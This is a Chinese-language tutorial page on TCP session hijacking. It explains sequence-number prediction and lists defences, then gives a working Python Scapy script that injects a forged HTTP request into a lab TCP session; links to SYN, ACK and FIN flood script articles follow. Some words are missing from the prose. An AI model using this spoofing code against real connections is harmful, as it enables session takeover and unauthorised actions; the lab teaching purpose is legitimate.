使用 Scapy 库编写 TCP脚本

简介: 使用 Scapy 库编写 TCP脚本

一、介绍

TCP(TCP Hijacking),也称为会话劫持,是一种方式,在合法用户与服务器之间的通信过程中插入或数据包,从而控制通信会话。通过TCP可以获取敏感信息、执行未授权的操作或中断正常通信。


1.1 TCP的原理

TCP主要利用了TCP协议的以下特性:


序列号预测:TCP连接中的数据包是按序列号顺序传输的,可以通过监听网络流量预测下一个有效的序列号。

中间人(MITM):可以通过中间人拦截和篡改通信数据包,从而控制通信会话。

1.2 TCP的类型

主动劫持:通过发送伪造的数据包中断或接管现有的TCP连接。

被动劫持:通过监听网络流量,获取会话中的敏感信息。

1.3 防御措施

加密通信:使用TLS/SSL等加密协议保护通信数据,防止监听和篡改数据包。

使用安全的序列号生成算法:在TCP连接建立时使用强序列号生成算法,增加序列号的不可预测性。

入侵检测系统(IDS):部署IDS实时监控网络流量,检测并阻止异常的TCP数据包。

网络隔离和分段:通过网络隔离和分段,限制获取敏感的网络流量。

双因素认证:在关键业务场景中使用双因素认证,增强通信的安全性。

通过这些防御措施,可以有效减缓或防止TCP,确保网络通信的安全性和稳定性。

二、实验环境

用户 Kali 在与服务器通信:192.168.134.147

服务器:192.168.134.148

三、实操演示

先获取到序列号及目标端口

以下是一个使用Python和Scapy库实现TCP劫持攻击的示例代码:

from scapy.all import *
from scapy.layers.inet import TCP
 
 
def tcp_hijack_attack(victim_ip, victim_port, server_ip, server_port, seq, ack, data):
    # 构造IP和TCP头部
    ip = IP(src=victim_ip, dst=server_ip)
    tcp = TCP(sport=victim_port, dport=server_port, seq=seq, ack=ack, flags="PA")  # PA表示带有数据的包
    payload = data
 
    # 发送伪造数据包
    send(ip / tcp / payload, verbose=1)
    print(
        f"Sent TCP hijack packet from {victim_ip}:{victim_port} to {server_ip}:{server_port} with seq={seq} and ack={ack}")
 
 
if __name__ == "__main__":
    victim_ip = "192.168.134.147"  # 受害者客户端的IP地址
    victim_port = 49658  # 受害者客户端的端口
    server_ip = "192.168.134.148"  # 服务器的IP地址
    server_port = 8080  # 服务器的端口
    seq = 182  # 预测的序列号
    ack = 426  # 确认号
    data = "GET / HTTP/1.1\r\nHost: www.hubstc.com.cn\r\n\r\n"  # 伪造的数据
 
    tcp_hijack_attack(victim_ip, victim_port, server_ip, server_port, seq, ack, data)

相关实践学习
通过Ingress进行灰度发布
本场景您将运行一个简单的应用,部署一个新的应用用于新的发布,并通过Ingress能力实现灰度发布。
容器应用与集群管理
欢迎来到《容器应用与集群管理》课程,本课程是“云原生容器Clouder认证“系列中的第二阶段。课程将向您介绍与容器集群相关的概念和技术,这些概念和技术可以帮助您了解阿里云容器服务ACK/ACK Serverless的使用。同时,本课程也会向您介绍可以采取的工具、方法和可操作步骤,以帮助您了解如何基于容器服务ACK Serverless构建和管理企业级应用。 学习完本课程后,您将能够: 掌握容器集群、容器编排的基本概念 掌握Kubernetes的基础概念及核心思想 掌握阿里云容器服务ACK/ACK Serverless概念及使用方法 基于容器服务ACK Serverless搭建和管理企业级网站应用
相关文章
|
2月前
|
存储 移动开发 网络协议
tcp客户端编程py
tcp客户端编程py
|
2月前
|
网络协议 Python
Python创建一个TCP服务器
Python创建一个TCP服务器
23 0
|
5月前
|
监控 安全 网络安全
使用 Scapy 库编写 ICMP 时间戳脚本
使用 Scapy 库编写 ICMP 时间戳脚本
使用 Scapy 库编写 ICMP 时间戳脚本
|
5月前
|
监控 安全 网络安全
使用 Scapy 库编写 ICMP 洪水脚本
使用 Scapy 库编写 ICMP 洪水脚本
使用 Scapy 库编写 ICMP 洪水脚本
|
5月前
|
监控 网络协议 安全
使用 Scapy 库编写 TCP RST 脚本
使用 Scapy 库编写 TCP RST 脚本
|
5月前
|
监控 安全 网络安全
使用 Scapy 库编写 ICMP 不可达脚本
使用 Scapy 库编写 ICMP 不可达脚本
|
5月前
|
监控 网络协议 安全
使用 Scapy 库编写 TCP FIN 洪水脚本
使用 Scapy 库编写 TCP FIN 洪水脚本
|
5月前
|
监控 网络协议 安全
使用 Scapy 库编写 TCP 窗口大小探测脚本
使用 Scapy 库编写 TCP 窗口大小探测脚本
|
5月前
|
网络协议 安全 网络安全
使用 Scapy 库编写 TCP SYN 洪水脚本
使用 Scapy 库编写 TCP SYN 洪水脚本
|
5月前
|
监控 网络协议 安全
使用 Scapy 库编写 TCP ACK 洪水脚本
使用 Scapy 库编写 TCP ACK 洪水脚本